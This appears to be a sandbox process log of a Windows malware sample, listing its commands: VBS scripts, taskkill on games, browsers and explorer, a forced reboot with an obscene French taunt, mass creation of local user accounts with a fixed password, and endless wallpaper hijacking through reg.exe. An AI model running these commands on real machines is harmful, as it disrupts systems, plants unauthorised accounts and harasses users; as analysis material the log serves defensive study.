"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4448,i,1602949858158667699,12464335823361976127,262144 --variations-seed-version --mojo-platform-channel-handle=4412 /prefetch:8

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9391.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26921.vbs"

C:\Windows\system32\timeout.exe

timeout 60

C:\Windows\system32\rundll32.exe

rundll32 user32.dll, SwapMouseButton

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\14246.vbs"

C:\Windows\system32\timeout.exe

timeout 14

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x394 0x4f4

C:\Windows\system32\taskkill.exe

taskkill /F /IM hl2.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM javaw.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM RobloxPlayerBeta.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM FortniteClient-Win64-Shipping.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM Among Us.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM explorer.exe

C:\Windows\system32\shutdown.exe

shutdown -r -t 300 -c "Dans 5 minutes tu n'as plus de PC fils de viol, la OGK t'a bien baiser le cul :)"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\23948.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20725.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4235.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26852.vbs" 28089.bat

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\28089.bat" "

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\net.exe

net user LE bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user LE bitasse /add /expire:never /active:yes

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\risitas.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Users\Admin\AppData\Local\Temp\melter.exe

melter.exe

C:\Windows\system32\net.exe

net user 18-25 bitasse /add /expire:never /active:yes

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 18-25 bitasse /add /expire:never /active:yes

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\net.exe

net user T'A bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user T'A bitasse /add /expire:never /active:yes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\net.exe

net user BIEN bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user BIEN bitasse /add /expire:never /active:yes

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\net.exe

net user D?TRUIT bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user D?TRUIT bitasse /add /expire:never /active:yes

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\net.exe

net user LE bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user LE bitasse /add /expire:never /active:yes

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\net.exe

net user CUL bitasse /add /expire:never /active:yes

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user CUL bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user ENFANT bitasse /add /expire:never /active:yes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user ENFANT bitasse /add /expire:never /active:yes

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\net.exe

net user DE bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user DE bitasse /add /expire:never /active:yes

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\net.exe

net user SATAN bitasse /add /expire:never /active:yes

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user SATAN bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 941488320898 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 941488320898 bitasse /add /expire:never /active:yes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\net.exe

net user 18849574315444 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 18849574315444 bitasse /add /expire:never /active:yes

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\net.exe

net user 26022636112598 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 26022636112598 bitasse /add /expire:never /active:yes

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\net.exe

net user 214902539824108 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 214902539824108 bitasse /add /expire:never /active:yes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\net.exe

net user 13982042422066 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 13982042422066 bitasse /add /expire:never /active:yes

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\net.exe

net user 248421527631217 bitasse /add /expire:never /active:yes

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 248421527631217 bitasse /add /expire:never /active:yes

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\net.exe

net user 21904155148759 bitasse /add /expire:never /active:yes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 21904155148759 bitasse /add /expire:never /active:yes

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\net.exe

net user 1840380097177 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 1840380097177 bitasse /add /expire:never /active:yes

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\net.exe

net user 18524648911123 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 18524648911123 bitasse /add /expire:never /active:yes

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\net.exe

net user 43871908525489 bitasse /add /expire:never /active:yes

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 43871908525489 bitasse /add /expire:never /active:yes

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\net.exe

net user 314021462413291 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 314021462413291 bitasse /add /expire:never /active:yes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\net.exe

net user 735291419152 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 735291419152 bitasse /add /expire:never /active:yes

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\net.exe

net user 64093165125703 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 64093165125703 bitasse /add /expire:never /active:yes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\net.exe

net user 124422046724511 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 124422046724511 bitasse /add /expire:never /active:yes

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\net.exe

net user 147862219226991 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 147862219226991 bitasse /add /expire:never /active:yes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\net.exe

net user 30027172512632 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 30027172512632 bitasse /add /expire:never /active:yes

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\net.exe

net user 203542707630234 bitasse /add /expire:never /active:yes

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 203542707630234 bitasse /add /expire:never /active:yes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\net.exe

net user 135591157417569 bitasse /add /expire:never /active:yes

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 135591157417569 bitasse /add /expire:never /active:yes

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

[The six-process cycle immediately above (WScript.exe running 31845.vbs; reg.exe clearing and re-setting the wallpaper value, deleting the Internet Explorer WallpaperStyle value and setting WallpaperStyle to 2; rundll32 calling user32.dll,UpdatePerUserSystemParameters) is recorded 52 times in full within this span of the listing, with identical command lines each time. The 51 verbatim repeats are collapsed here; the listing resumes with the start of the next iteration.]

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

